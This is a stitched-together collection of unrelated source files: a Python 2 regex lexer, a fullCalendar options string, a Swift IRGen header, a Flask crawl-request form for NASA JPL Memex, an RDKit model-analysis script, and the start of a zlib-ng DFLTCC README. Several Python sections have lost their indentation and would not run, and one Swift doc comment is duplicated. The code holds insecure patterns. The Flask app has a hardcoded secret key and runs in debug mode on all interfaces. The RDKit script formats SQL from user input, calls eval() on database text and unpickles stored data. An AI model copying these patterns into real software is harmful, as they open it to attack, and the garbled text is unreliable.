                return -int(new_state[5:])
            else:
                assert False, 'unknown new state %r' % new_state
        elif isinstance(new_state, combined):
            # combine a new state from existing ones
            tmp_state = '_tmp_%d' % cls._tmpname
            cls._tmpname += 1
            itokens = []
            for istate in new_state:
                assert istate != new_state, 'circular state ref %r' % istate
                itokens.extend(cls._process_state(unprocessed,
                                                  processed, istate))
            processed[tmp_state] = itokens
            return (tmp_state,)
        elif isinstance(new_state, tuple):
            # push more than one state
            for istate in new_state:
                assert (istate in unprocessed or
                        istate in ('#pop', '#push')), \
                    'unknown new state ' + istate
            return new_state
        else:
            assert False, 'unknown new state def %r' % new_state

    def _process_state(cls, unprocessed, processed, state):
        """Preprocess a single state definition.

        Recursively resolves ``include`` references; memoizes results
        in ``processed``.
        """
        assert type(state) is str, "wrong state name %r" % state
        assert state[0] != '#', "invalid state name %r" % state
        if state in processed:
            return processed[state]
        tokens = processed[state] = []
        rflags = cls.flags
        for tdef in unprocessed[state]:
            if isinstance(tdef, include):
                # it's a state reference
                assert tdef != state, "circular state reference %r" % state
                tokens.extend(cls._process_state(unprocessed, processed,
                                                 str(tdef)))
                continue
            if isinstance(tdef, _inherit):
                # processed already (handled by get_tokendefs)
                continue
            assert type(tdef) is tuple, "wrong rule def %r" % tdef
            try:
                rex = cls._process_regex(tdef[0], rflags)
            except Exception, err:
                raise ValueError("uncompilable regex %r in state %r of %r: %s" %
                                 (tdef[0], state, cls, err))
            token = cls._process_token(tdef[1])
            if len(tdef) == 2:
                # No state transition given.
                new_state = None
            else:
                new_state = cls._process_new_state(tdef[2],
                                                   unprocessed, processed)
            tokens.append((rex, token, new_state))
        return tokens

    def process_tokendef(cls, name, tokendefs=None):
        """Preprocess a dictionary of token definitions."""
        processed = cls._all_tokens[name] = {}
        tokendefs = tokendefs or cls.tokens[name]
        for state in tokendefs.keys():
            cls._process_state(tokendefs, processed, state)
        return processed

    def get_tokendefs(cls):
        """
        Merge tokens from superclasses in MRO order, returning a single tokendef
        dictionary.

        Any state that is not defined by a subclass will be inherited
        automatically. States that *are* defined by subclasses will, by
        default, override that state in the superclass. If a subclass wishes to
        inherit definitions from a superclass, it can use the special value
        "inherit", which will cause the superclass' state definition to be
        included at that point in the state.
        """
        tokens = {}
        inheritable = {}
        for c in itertools.chain((cls,), cls.__mro__):
            toks = c.__dict__.get('tokens', {})
            for state, items in toks.iteritems():
                curitems = tokens.get(state)
                if curitems is None:
                    # First (most-derived) definition of this state wins;
                    # remember where its "inherit" marker sits, if any.
                    tokens[state] = items
                    try:
                        inherit_ndx = items.index(inherit)
                    except ValueError:
                        continue
                    inheritable[state] = inherit_ndx
                    continue
                inherit_ndx = inheritable.pop(state, None)
                if inherit_ndx is None:
                    continue
                # Replace the "inherit" value with the items
                curitems[inherit_ndx:inherit_ndx+1] = items
                try:
                    # If the superclass also used "inherit", keep chaining.
                    new_inh_ndx = items.index(inherit)
                except ValueError:
                    pass
                else:
                    inheritable[state] = inherit_ndx + new_inh_ndx
        return tokens

    def __call__(cls, *args, **kwds):
        """Instantiate cls after preprocessing its token definitions."""
        if '_tokens' not in cls.__dict__:
            cls._all_tokens = {}
            cls._tmpname = 0
            if hasattr(cls, 'token_variants') and cls.token_variants:
                # don't process yet
                pass
            else:
                cls._tokens = cls.process_tokendef('', cls.get_tokendefs())
        return type.__call__(cls, *args, **kwds)
class RegexLexer(Lexer):
    """
    Base for simple stateful regular expression-based lexers.
    Simplifies the lexing process so that you need only
    provide a list of states and regular expressions.
    """
    # Python 2 metaclass declaration; builds _tokens lazily on first
    # instantiation.
    __metaclass__ = RegexLexerMeta

    #: Flags for compiling the regular expressions.
    #: Defaults to MULTILINE.
    flags = re.MULTILINE

    #: Dict of ``{'state': [(regex, tokentype, new_state), ...], ...}``
    #:
    #: The initial state is 'root'.
    #: ``new_state`` can be omitted to signify no state transition.
    #: If it is a string, the state is pushed on the stack and changed.
    #: If it is a tuple of strings, all states are pushed on the stack and
    #: the current state will be the topmost.
    #: It can also be ``combined('state1', 'state2', ...)``
    #: to signify a new, anonymous state combined from the rules of two
    #: or more existing ones.
    #: Furthermore, it can be '#pop' to signify going back one step in
    #: the state stack, or '#push' to push the current state on the stack
    #: again.
    #:
    #: The tuple can also be replaced with ``include('state')``, in which
    #: case the rules from the state named by the string are included in the
    #: current one.
    tokens = {}

    def get_tokens_unprocessed(self, text, stack=('root',)):
        """
        Split ``text`` into (tokentype, text) pairs.

        ``stack`` is the initial stack (default: ``['root']``)
        """
        pos = 0
        tokendefs = self._tokens
        statestack = list(stack)
        statetokens = tokendefs[statestack[-1]]
        while 1:
            # Try each rule of the current state in order; the first match
            # wins and restarts the rule loop (via break).
            for rexmatch, action, new_state in statetokens:
                m = rexmatch(text, pos)
                if m:
                    if type(action) is _TokenType:
                        yield pos, action, m.group()
                    else:
                        # Callback action (e.g. bygroups/using).
                        for item in action(self, m):
                            yield item
                    pos = m.end()
                    if new_state is not None:
                        # state transition
                        if isinstance(new_state, tuple):
                            for state in new_state:
                                if state == '#pop':
                                    statestack.pop()
                                elif state == '#push':
                                    statestack.append(statestack[-1])
                                else:
                                    statestack.append(state)
                        elif isinstance(new_state, int):
                            # pop (new_state is negative: number of states)
                            del statestack[new_state:]
                        elif new_state == '#push':
                            statestack.append(statestack[-1])
                        else:
                            assert False, "wrong state def: %r" % new_state
                        statetokens = tokendefs[statestack[-1]]
                    break
            else:
                # No rule matched at this position.
                try:
                    if text[pos] == '\n':
                        # at EOL, reset state to "root"
                        statestack = ['root']
                        statetokens = tokendefs['root']
                        yield pos, Text, u'\n'
                        pos += 1
                        continue
                    # Emit the offending character as an Error token and
                    # move on.
                    yield pos, Error, text[pos]
                    pos += 1
                except IndexError:
                    # End of text reached.
                    break
class LexerContext(object):
    """
    Mutable cursor state (text, position, end offset and state stack)
    threaded through ExtendedRegexLexer.
    """
    def __init__(self, text, pos, stack=None, end=None):
        self.text = text
        self.pos = pos
        # A falsy end (including 0) falls back to the full text length.
        if end:
            self.end = end
        else:
            self.end = len(text)
        if stack:
            self.stack = stack
        else:
            self.stack = ['root']

    def __repr__(self):
        return 'LexerContext(%r, %r, %r)' % (
            self.text, self.pos, self.stack)
class ExtendedRegexLexer(RegexLexer):
    """
    A RegexLexer that uses a context object to store its state.
    """

    def get_tokens_unprocessed(self, text=None, context=None):
        """
        Split ``text`` into (tokentype, text) pairs.
        If ``context`` is given, use this lexer context instead.
        """
        tokendefs = self._tokens
        if not context:
            ctx = LexerContext(text, 0)
            statetokens = tokendefs['root']
        else:
            ctx = context
            statetokens = tokendefs[ctx.stack[-1]]
            text = ctx.text
        while 1:
            for rexmatch, action, new_state in statetokens:
                m = rexmatch(text, ctx.pos, ctx.end)
                if m:
                    if type(action) is _TokenType:
                        yield ctx.pos, action, m.group()
                        ctx.pos = m.end()
                    else:
                        # Callback action; it may mutate ctx.stack.
                        for item in action(self, m, ctx):
                            yield item
                        if not new_state:
                            # altered the state stack?
                            statetokens = tokendefs[ctx.stack[-1]]
                        # CAUTION: callback must set ctx.pos!
                    if new_state is not None:
                        # state transition
                        if isinstance(new_state, tuple):
                            for state in new_state:
                                if state == '#pop':
                                    ctx.stack.pop()
                                elif state == '#push':
                                    # BUGFIX: this previously referenced the
                                    # undefined name ``statestack`` (a
                                    # NameError at runtime); duplicate the
                                    # top of *this* context's stack instead,
                                    # mirroring RegexLexer.
                                    ctx.stack.append(ctx.stack[-1])
                                else:
                                    ctx.stack.append(state)
                        elif isinstance(new_state, int):
                            # pop (new_state is negative: number of states)
                            del ctx.stack[new_state:]
                        elif new_state == '#push':
                            ctx.stack.append(ctx.stack[-1])
                        else:
                            assert False, "wrong state def: %r" % new_state
                        statetokens = tokendefs[ctx.stack[-1]]
                    break
            else:
                try:
                    if ctx.pos >= ctx.end:
                        break
                    if text[ctx.pos] == '\n':
                        # at EOL, reset state to "root"
                        ctx.stack = ['root']
                        statetokens = tokendefs['root']
                        yield ctx.pos, Text, u'\n'
                        ctx.pos += 1
                        continue
                    yield ctx.pos, Error, text[ctx.pos]
                    ctx.pos += 1
                except IndexError:
                    break
def do_insertions(insertions, tokens):
    """
    Helper for lexers which must combine the results of several
    sublexers.

    ``insertions`` is a list of ``(index, itokens)`` pairs.
    Each ``itokens`` iterable should be inserted at position
    ``index`` into the token stream given by the ``tokens``
    argument.

    The result is a combined token stream.

    TODO: clean up the code here.
    """
    insertions = iter(insertions)
    try:
        index, itokens = insertions.next()
    except StopIteration:
        # no insertions
        for item in tokens:
            yield item
        return

    realpos = None
    insleft = True
    # iterate over the token stream where we want to insert
    # the tokens from the insertion list.
    for i, t, v in tokens:
        # first iteration. store the position of first item
        if realpos is None:
            realpos = i
        oldi = 0
        # Split the current token wherever insertion points fall inside it.
        while insleft and i + len(v) >= index:
            tmpval = v[oldi:index - i]
            yield realpos, t, tmpval
            realpos += len(tmpval)
            # Emit the inserted tokens, advancing the output position.
            for it_index, it_token, it_value in itokens:
                yield realpos, it_token, it_value
                realpos += len(it_value)
            oldi = index - i
            try:
                index, itokens = insertions.next()
            except StopIteration:
                insleft = False
                break  # not strictly necessary
        # Remainder of the current token after the last insertion point.
        yield realpos, t, v[oldi:]
        realpos += len(v) - oldi

    # leftover tokens
    while insleft:
        # no normal tokens, set realpos to zero
        realpos = realpos or 0
        for p, t, v in itokens:
            yield realpos, t, v
            realpos += len(v)
        try:
            index, itokens = insertions.next()
        except StopIteration:
            insleft = False
            break  # not strictly necessary
from .models import Event
# fullCalendar initialisation options, embedded verbatim into the page as a
# JavaScript object literal.
# NOTE(review): 'timezone' is set to the string 'UTC-6'; fullCalendar expects
# a timezone name or offset it can parse -- confirm this value is honoured.
OPTIONS = """{ timeFormat: "H:mm",
               header: {
                   left: 'prev,next today',
                   center: 'title',
                   right: 'month,agendaWeek,agendaDay',
               },
               allDaySlot: false,
               firstDay: 0,
               timezone: 'UTC-6',
               weekMode: 'liquid',
               slotMinutes: 15,
               defaultEventMinutes: 30,
               minTime: 8,
               maxTime: 20,
               editable: false,
               dayClick: function(date, allDay, jsEvent, view) {
                   if (allDay) {
                       $('#calendar').fullCalendar('gotoDate', date)
                       $('#calendar').fullCalendar('changeView', 'agendaDay')
                   }
               },
               eventClick: function(event, jsEvent, view) {
                   if (view.name == 'month') {
                       $('#calendar').fullCalendar('gotoDate', event.start)
                       $('#calendar').fullCalendar('changeView', 'agendaDay')
                   }
               },
           }"""
//===--- IndirectTypeInfo.h - Convenience for indirected types --*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// This file defines IndirectTypeInfo, which is a convenient abstract
// implementation of TypeInfo for working with types that are always
// passed or returned indirectly.
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_IRGEN_INDIRECTTYPEINFO_H
#define SWIFT_IRGEN_INDIRECTTYPEINFO_H
#include "Explosion.h"
#include "TypeInfo.h"
#include "IRGenFunction.h"
namespace swift {
namespace irgen {
/// IndirectTypeInfo - An abstract class designed for use when
/// implementing a type which is always passed indirectly.
///
/// Subclasses must implement the following operations:
/// allocateStack
/// assignWithCopy
/// initializeWithCopy
/// destroy
/// IndirectTypeInfo - Abstract CRTP helper for TypeInfo implementations of
/// types that are always passed and returned indirectly (by address).
///
/// Subclasses must implement the following operations:
///   allocateStack
///   assignWithCopy
///   initializeWithCopy
///   destroy
template <class Derived, class Base>
class IndirectTypeInfo : public Base {
protected:
  // Forward all constructor arguments to the chosen Base TypeInfo class.
  template <class... T> IndirectTypeInfo(T &&...args)
    : Base(::std::forward<T>(args)...) {}

  // CRTP downcast so the helpers below can dispatch statically to the
  // subclass's implementations without virtual calls.
  const Derived &asDerived() const {
    return static_cast<const Derived &>(*this);
  }

public:
  // An indirect type is exploded as a single aggregate element carrying
  // its storage type and best-known alignment.
  void getSchema(ExplosionSchema &schema) const override {
    schema.add(ExplosionSchema::Element::forAggregate(this->getStorageType(),
                                                this->getBestKnownAlignment()));
  }

  // The parameter arrives as a pointer in the explosion; take ownership of
  // the pointed-to value into `dest`.
  void initializeFromParams(IRGenFunction &IGF, Explosion &params, Address dest,
                            SILType T, bool isOutlined) const override {
    Address src = this->getAddressForPointer(params.claimNext());
    asDerived().Derived::initializeWithTake(IGF, dest, src, T, isOutlined,
                                            /*zeroizeIfSensitive=*/ true);
  }

  // Assign-with-take is destroy of the old value followed by a take-init
  // from the source.
  void assignWithTake(IRGenFunction &IGF, Address dest, Address src, SILType T,
                      bool isOutlined) const override {
    asDerived().Derived::destroy(IGF, dest, T, isOutlined);
    asDerived().Derived::initializeWithTake(IGF, dest, src, T, isOutlined,
                                            /*zeroizeIfSensitive=*/ true);
  }
};
}
}
#endif | c | github | https://github.com/apple/swift | lib/IRGen/IndirectTypeInfo.h |
import os
import smtplib
from email.mime.text import MIMEText

from flask import Flask, request, redirect, url_for, render_template, jsonify
from flask_wtf import Form
from wtforms import StringField, TextField, TextAreaField, DateField, SelectField, RadioField, BooleanField
from wtforms.validators import DataRequired, Optional

app = Flask(__name__)
def send_mail(form):
    """Send the two notification emails for a submitted crawl request.

    One confirmation goes to the requester, one detailed summary to the
    Memex JPL mailing list, both via the system ``mail`` command.

    The message body is fed through stdin and the recipient/subject are
    passed as separate argv elements, so user-supplied form values are
    never interpreted by a shell.  (The previous implementation built a
    bash here-string with ``os.system``, which allowed shell command
    injection through any form field.)
    """
    import subprocess

    first = form.first.data
    last = form.last.data
    email = form.email.data
    description = form.description.data
    crawl_type = form.crawl_type.data
    recurring = form.recurring.data
    seed_ulrs = form.seed_ulrs.data
    crawling_config = form.crawling_config.data
    content_type = form.content_type.data
    how_much_data = form.how_much_data.data
    custom_metrics = form.custom_metrics.data
    extraction = form.extraction.data
    common_data_repository = form.common_data_repository.data
    raw_files = form.raw_files.data
    nutch_sequence_files = form.nutch_sequence_files.data
    custom_schema = form.custom_schema.data
    common_crawl_format = form.common_crawl_format.data
    warc = form.warc.data
    needed_by = form.needed_by.data

    def _mail(recipient, subject, body):
        # argv list + stdin body: no shell is involved, so field values
        # cannot break out of the command.
        proc = subprocess.Popen(["mail", "-s", subject, recipient],
                                stdin=subprocess.PIPE)
        proc.communicate(body.encode("utf-8"))

    client_body = 'Thank you for submitting your crawl data acquisition request to NASA JPL. Someone from the Crawl Team will contact you personally certainly within the next 24 hours. Our Crawl Infrastructure is already working on acquiring your requested data. If you have any issues, please do not hesitate to contact us on memex-crawl@jpl.nasa.gov. Thank you'
    _mail(email, 'Memex Crawl Request', client_body)

    memex_body = 'Request details: \n First Name:{0} \n Last Name:{1} \n Email: {2} \n Description: {3} \n Crawl Type: {4} \n Recurring: {5} \n Seed Urls: {6} \n Crawling Config: {7} \n Content Type: {8} \n How much data: {9} \n Custom Metrics: {10} \n Extraction: {11} \n Common Data Repository: {12} \n Raw Files: {13} \n Nutch Sequence: {14} \n Custom Schema: {15} \n Common Crawl Format: {16} \n WARC: {17} \n Needed by: {18} \n \n Thanks \n Memex Crawl Team'.format(first, last, email, description, crawl_type, recurring, seed_ulrs, crawling_config, content_type, how_much_data, custom_metrics, extraction, common_data_repository, raw_files, nutch_sequence_files, custom_schema, common_crawl_format, warc, needed_by)
    _mail('memex-jpl@googlegroups.com', '[New Crawl Request]', memex_body)
class MyForm(Form):
    """Crawl data acquisition request form.

    Required free-text fields use ``DataRequired``; the delivery-format
    checkboxes and ``needed_by`` are genuinely optional, so they use
    ``Optional()``.  (They previously used ``DataRequired(False)``, which
    passes ``False`` as the validator's error *message* and still forces
    every checkbox to be ticked and the field to be non-empty.)

    Note: ``seed_ulrs`` is a typo for "seed_urls" but is kept because
    ``send_mail`` reads the field by this name.
    """
    first = StringField('First', validators=[DataRequired()])
    last = StringField('Last', validators=[DataRequired()])
    email = StringField('Email', validators=[DataRequired()])
    description = TextAreaField('Description of Use Case', validators=[DataRequired()])
    crawl_type = RadioField(u'Crawl Type', choices=[('exploratory', 'Exploratory'), ('defined', 'Defined'), ('particula_depth', 'Particula Depth')])
    recurring = StringField('Recurring', validators=[DataRequired()])
    seed_ulrs = TextAreaField('Seed Urls', validators=[DataRequired()])
    crawling_config = TextAreaField('Crawling configuration request', validators=[DataRequired()])
    content_type = RadioField('Content Type', choices=[('images', 'Images'), ('videos', 'Videos'), ('multimedia', 'Multimedia (images + videos)'), ('everything', 'Everything')])
    how_much_data = StringField('How much data', validators=[DataRequired()])
    custom_metrics = StringField('Custom Metrics', validators=[DataRequired()])
    extraction = TextAreaField('Extraction', validators=[DataRequired()])
    common_data_repository = BooleanField('Common Data Repository', validators=[Optional()])
    raw_files = BooleanField('Raw files', validators=[Optional()])
    nutch_sequence_files = BooleanField('Nutch Sequence Files', validators=[Optional()])
    custom_schema = BooleanField('Custom Schema', validators=[Optional()])
    common_crawl_format = BooleanField('Common Crawl Format', validators=[Optional()])
    warc = BooleanField('WARC', validators=[Optional()])
    needed_by = StringField('Needed by', validators=[Optional()])
@app.route('/', methods=('GET', 'POST'))
def index():
    """Render the crawl-request form; on a valid POST, send the
    notification mails and redirect to the confirmation page."""
    message = "Welcome to the DARPA Memex crawl data request CrawlForm provided by NASA JPL. This form enables clients to submit jobs to be processed and delivered by the NASA JPL Team. A member of the Crawl Team will also reach out and ensure that the Crawl job meets your specifications and exceptions. We encourage you to provide as much input into the fields below as possible."
    form = MyForm()
    error = ""
    if form.validate_on_submit():
        send_mail(form)
        return redirect('/success')
    # GET request or validation failure: re-render the form.
    # (A dead "else: pass" branch was removed here.)
    return render_template('index.html', form=form, error=error, message=message, backhome="")
@app.route("/success")
def success():
backhome = "True"
message = "Thank you for submitting your crawl data acquisition request to NASA JPL. Someone from the Crawl Team will contact you personally certainly within the next 24 hours. Our Crawl Infrastructure is already working on acquiring your requested data. If you have any issues, please do not hesitate to contact us on memex-crawl@jpl.nasa.gov. Thank you"
return render_template('index.html', message=message, backhome=backhome)
if __name__ == "__main__":
app.debug = True
app.secret_key = 's3cr3t'
app.run(host="0.0.0.0", port=4000, debug=True) | unknown | codeparrot/codeparrot-clean | ||
# $Id$
#
# Copyright (C) 2002-2008 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" command line utility to report on the contributions of descriptors to
tree-based composite models
Usage: AnalyzeComposite [optional args] <models>
<models>: file name(s) of pickled composite model(s)
(this is the name of the db table if using a database)
Optional Arguments:
-n number: the number of levels of each model to consider
-d dbname: the database from which to read the models
-N Note: the note string to search for to pull models from the database
-v: be verbose whilst screening
"""
from __future__ import print_function
import sys
import numpy
from rdkit.Dbase.DbConnection import DbConnect
from rdkit.ML import ScreenComposite
from rdkit.ML.Data import Stats
from rdkit.ML.DecTree import TreeUtils, Tree
from rdkit.six.moves import cPickle
__VERSION_STRING = "2.2.0"
def ProcessIt(composites, nToConsider=3, verbose=0):
  """Average descriptor usage over the top *nToConsider* levels of tree models.

  For every tree model in every composite, tallies which descriptors appear
  at which of the first *nToConsider* levels (each hit weighted by 1/nModels
  so every composite contributes equally), then averages the per-composite
  tallies over all composites.

  Arguments:
    composites: sequence of composite models; the first one supplies the
      descriptor-name list used to decide whether there is anything to do.
    nToConsider: number of tree levels to examine.
    verbose: >0 prints a per-composite table, >=0 prints the global summary,
      negative values stay silent.

  Returns a list of rows
  ``[descriptorName, frac(level 0), ..., frac(level nToConsider-1), total]``,
  or ``[]`` when the composite holds nothing beyond the two bookkeeping
  columns.
  """
  composite = composites[0]
  nComposites = len(composites)
  ns = composite.GetDescriptorNames()
  if len(ns) <= 2:
    # Only the two bookkeeping columns: no descriptors to report on.
    return []
  globalRes = {}
  nDone = 1
  descNames = {}
  for composite in composites:
    if verbose > 0:
      print('#------------------------------------')
      print('Doing: ', nDone)
    nModels = len(composite)
    nDone += 1
    res = {}
    for i in range(len(composite)):
      model = composite.GetModel(i)
      # Only tree-based models contribute; other model types are skipped.
      if isinstance(model, Tree.TreeNode):
        levels = TreeUtils.CollectLabelLevels(model, {}, 0, nToConsider)
        TreeUtils.CollectDescriptorNames(model, descNames, 0, nToConsider)
        for descId, level in levels.items():
          # numpy.float was deprecated in NumPy 1.20 and removed in 1.24;
          # the builtin float is the documented replacement.
          v = res.get(descId, numpy.zeros(nToConsider, float))
          v[level] += 1. / nModels
          res[descId] = v
    for k in res:
      v = globalRes.get(k, numpy.zeros(nToConsider, float))
      v += res[k] / nComposites
      globalRes[k] = v
    if verbose > 0:
      for k in res:
        name = descNames[k]
        strRes = ', '.join(['%4.2f' % x for x in res[k]])
        print('%s,%s,%5.4f' % (name, strRes, sum(res[k])))
      print()
  if verbose >= 0:
    print('# Average Descriptor Positions')
  retVal = []
  for k in globalRes:
    name = descNames[k]
    if verbose >= 0:
      strRes = ', '.join(['%4.2f' % x for x in globalRes[k]])
      print('%s,%s,%5.4f' % (name, strRes, sum(globalRes[k])))
    tmp = [name]
    tmp.extend(globalRes[k])
    tmp.append(sum(globalRes[k]))
    retVal.append(tmp)
  if verbose >= 0:
    print()
  return retVal
def ErrorStats(conn, where, enrich=1):
  """Collect and aggregate error statistics for the runs matching *where*.

  Arguments:
    conn: an open DbConnect-style connection to the results table.
    where: SQL where clause (including the ``where`` keyword) selecting runs.
    enrich: target class for enrichment calculations; pass a negative value
      to skip enrichment entirely.

  Returns a dict of summary statistics — keys prefixed ``o`` for overall and
  ``h`` for holdout — or None when the query fails or matches no runs.
  """
  fields = ('overall_error,holdout_error,overall_result_matrix,' +
            'holdout_result_matrix,overall_correct_conf,overall_incorrect_conf,' +
            'holdout_correct_conf,holdout_incorrect_conf')
  try:
    data = conn.GetData(fields=fields, where=where)
  except Exception:
    import traceback
    traceback.print_exc()
    return None
  nPts = len(data)
  if not nPts:
    sys.stderr.write('no runs found\n')
    return None
  # numpy.float was deprecated in NumPy 1.20 and removed in 1.24; the builtin
  # float is the documented replacement and is what the alias always meant.
  overall = numpy.zeros(nPts, float)
  overallEnrich = numpy.zeros(nPts, float)
  oCorConf = 0.0
  oInCorConf = 0.0
  holdout = numpy.zeros(nPts, float)
  holdoutEnrich = numpy.zeros(nPts, float)
  hCorConf = 0.0
  hInCorConf = 0.0
  overallMatrix = None
  holdoutMatrix = None
  for i in range(nPts):
    if data[i][0] is not None:
      overall[i] = data[i][0]
      oCorConf += data[i][4]
      oInCorConf += data[i][5]
    if data[i][1] is not None:
      holdout[i] = data[i][1]
      haveHoldout = 1
    else:
      haveHoldout = 0
    # NOTE(review): result matrices are stored as Python-repr text and rebuilt
    # with eval(); this trusts the database contents. Fine for locally
    # generated result tables — do not point this at untrusted data.
    tmpOverall = 1. * eval(data[i][2])
    if enrich >= 0:
      overallEnrich[i] = ScreenComposite.CalcEnrichment(tmpOverall, tgt=enrich)
    if haveHoldout:
      tmpHoldout = 1. * eval(data[i][3])
      if enrich >= 0:
        holdoutEnrich[i] = ScreenComposite.CalcEnrichment(tmpHoldout, tgt=enrich)
    if overallMatrix is None:
      if data[i][2] is not None:
        overallMatrix = tmpOverall
      if haveHoldout and data[i][3] is not None:
        holdoutMatrix = tmpHoldout
    else:
      overallMatrix += tmpOverall
      if haveHoldout:
        holdoutMatrix += tmpHoldout
    if haveHoldout:
      hCorConf += data[i][6]
      hInCorConf += data[i][7]
  avgOverall = sum(overall) / nPts
  oCorConf /= nPts
  oInCorConf /= nPts
  overallMatrix /= nPts
  oSort = numpy.argsort(overall)
  oMin = overall[oSort[0]]
  overall -= avgOverall
  devOverall = numpy.sqrt(sum(overall**2) / (nPts - 1))
  res = {}
  res['oAvg'] = 100 * avgOverall
  res['oDev'] = 100 * devOverall
  res['oCorrectConf'] = 100 * oCorConf
  res['oIncorrectConf'] = 100 * oInCorConf
  res['oResultMat'] = overallMatrix
  res['oBestIdx'] = oSort[0]
  res['oBestErr'] = 100 * oMin
  if enrich >= 0:
    mean, dev = Stats.MeanAndDev(overallEnrich)
    res['oAvgEnrich'] = mean
    res['oDevEnrich'] = dev
  # NOTE(review): haveHoldout here carries the value from the *last* loop
  # iteration, i.e. the holdout block is emitted only if the final run had
  # holdout data. Preserved as-is; confirm this is the intended behaviour.
  if haveHoldout:
    avgHoldout = sum(holdout) / nPts
    hCorConf /= nPts
    hInCorConf /= nPts
    holdoutMatrix /= nPts
    hSort = numpy.argsort(holdout)
    hMin = holdout[hSort[0]]
    holdout -= avgHoldout
    devHoldout = numpy.sqrt(sum(holdout**2) / (nPts - 1))
    res['hAvg'] = 100 * avgHoldout
    res['hDev'] = 100 * devHoldout
    res['hCorrectConf'] = 100 * hCorConf
    res['hIncorrectConf'] = 100 * hInCorConf
    res['hResultMat'] = holdoutMatrix
    res['hBestIdx'] = hSort[0]
    res['hBestErr'] = 100 * hMin
    if enrich >= 0:
      mean, dev = Stats.MeanAndDev(holdoutEnrich)
      res['hAvgEnrich'] = mean
      res['hDevEnrich'] = dev
  return res
def _printResultMatrix(mat):
  """Pretty-print a result matrix with per-row and per-column accuracy.

  This replaces two verbatim copies of the same printing loop (overall and
  holdout) in the original ShowStats body.
  """
  tmp = numpy.transpose(mat)
  colCounts = sum(tmp)
  # NOTE(review): builtin sum(tmp, 1) sums the rows of ``tmp`` starting from 1,
  # i.e. it yields colCounts + 1 rather than per-row totals; numpy.sum(tmp,
  # axis=1) may have been intended. Kept as-is to preserve the printed output.
  rowCounts = sum(tmp, 1)
  for i in range(len(tmp)):
    if rowCounts[i] == 0:
      rowCounts[i] = 1
    row = tmp[i]
    print('\t\t', end='')
    for j in range(len(row)):
      print('% 6.2f' % row[j], end='')
    print('\t| % 4.2f' % (100. * tmp[i, i] / rowCounts[i]))
  print('\t\t', end='')
  for i in range(len(tmp)):
    print('------', end='')
  print()
  print('\t\t', end='')
  for i in range(len(tmp)):
    if colCounts[i] == 0:
      colCounts[i] = 1
    print('% 6.2f' % (100. * tmp[i, i] / colCounts[i]), end='')
  print()


def ShowStats(statD, enrich=1):
  """Print the error-statistics dictionary produced by ErrorStats().

  Arguments:
    statD: dict with the ``o*`` (and optionally ``h*``) keys from ErrorStats.
      The input dict is not modified (a copy is taken before the best-model
      indices are shifted to 1-based for display).
    enrich: enrichment target class used only for labelling; values <= -1
      suppress the enrichment lines.
  """
  statD = statD.copy()
  statD['oBestIdx'] = statD['oBestIdx'] + 1
  txt = """
# Error Statistics:
\tOverall: %(oAvg)6.3f%% (%(oDev)6.3f) %(oCorrectConf)4.1f/%(oIncorrectConf)4.1f
\t\tBest: %(oBestIdx)d %(oBestErr)6.3f%%""" % (statD)
  if 'hAvg' in statD:
    statD['hBestIdx'] = statD['hBestIdx'] + 1
    txt += """
\tHoldout: %(hAvg)6.3f%% (%(hDev)6.3f) %(hCorrectConf)4.1f/%(hIncorrectConf)4.1f
\t\tBest: %(hBestIdx)d %(hBestErr)6.3f%%
""" % (statD)
  print(txt)
  print()
  print('# Results matrices:')
  print('\tOverall:')
  _printResultMatrix(statD['oResultMat'])
  if enrich > -1 and 'oAvgEnrich' in statD:
    print('\t\tEnrich(%d): %.3f (%.3f)' % (enrich, statD['oAvgEnrich'], statD['oDevEnrich']))
  if 'hResultMat' in statD:
    print('\tHoldout:')
    _printResultMatrix(statD['hResultMat'])
    if enrich > -1 and 'hAvgEnrich' in statD:
      print('\t\tEnrich(%d): %.3f (%.3f)' % (enrich, statD['hAvgEnrich'], statD['hDevEnrich']))
  return
def Usage():
  """Print the module usage message (the module docstring) and abort.

  Exits the process with a non-zero status code; never returns.
  """
  print(__doc__)
  sys.exit(-1)
if __name__ == "__main__":
import getopt
try:
args, extras = getopt.getopt(sys.argv[1:], 'n:d:N:vX', ('skip',
'enrich=', ))
except Exception:
Usage()
count = 3
db = None
note = ''
verbose = 0
skip = 0
enrich = 1
for arg, val in args:
if arg == '-n':
count = int(val) + 1
elif arg == '-d':
db = val
elif arg == '-N':
note = val
elif arg == '-v':
verbose = 1
elif arg == '--skip':
skip = 1
elif arg == '--enrich':
enrich = int(val)
composites = []
if db is None:
for arg in extras:
composite = cPickle.load(open(arg, 'rb'))
composites.append(composite)
else:
tbl = extras[0]
conn = DbConnect(db, tbl)
if note:
where = "where note='%s'" % (note)
else:
where = ''
if not skip:
pkls = conn.GetData(fields='model', where=where)
composites = []
for pkl in pkls:
pkl = str(pkl[0])
comp = cPickle.loads(pkl)
composites.append(comp)
if len(composites):
ProcessIt(composites, count, verbose=verbose)
elif not skip:
print('ERROR: no composite models found')
sys.exit(-1)
if db:
res = ErrorStats(conn, where, enrich=enrich)
if res:
ShowStats(res) | unknown | codeparrot/codeparrot-clean | ||
# Introduction
This directory contains SystemZ deflate hardware acceleration support.
It can be enabled using the following build commands:
$ ./configure --with-dfltcc-deflate --with-dfltcc-inflate
$ make
or
$ cmake -DWITH_DFLTCC_DEFLATE=1 -DWITH_DFLTCC_INFLATE=1 .
$ make
When built like this, zlib-ng would compress using hardware on level 1,
and using software on all other levels. Decompression will always happen
in hardware. In order to enable hardware compression for levels 1-6
(i.e. to make it used by default) one could add
`-DDFLTCC_LEVEL_MASK=0x7e` to CFLAGS when building zlib-ng.
SystemZ deflate hardware acceleration is available on [IBM z15](
https://www.ibm.com/products/z15) and newer machines under the name [
"Integrated Accelerator for zEnterprise Data Compression"](
https://www.ibm.com/support/z-content-solutions/compression/). The
programming interface to it is a machine instruction called DEFLATE
CONVERSION CALL (DFLTCC). It is documented in Chapter 26 of [Principles
of Operation](https://publibfp.dhe.ibm.com/epubs/pdf/a227832c.pdf). Both
the code and the rest of this document refer to this feature simply as
"DFLTCC".
# Performance
Performance figures are published [here](
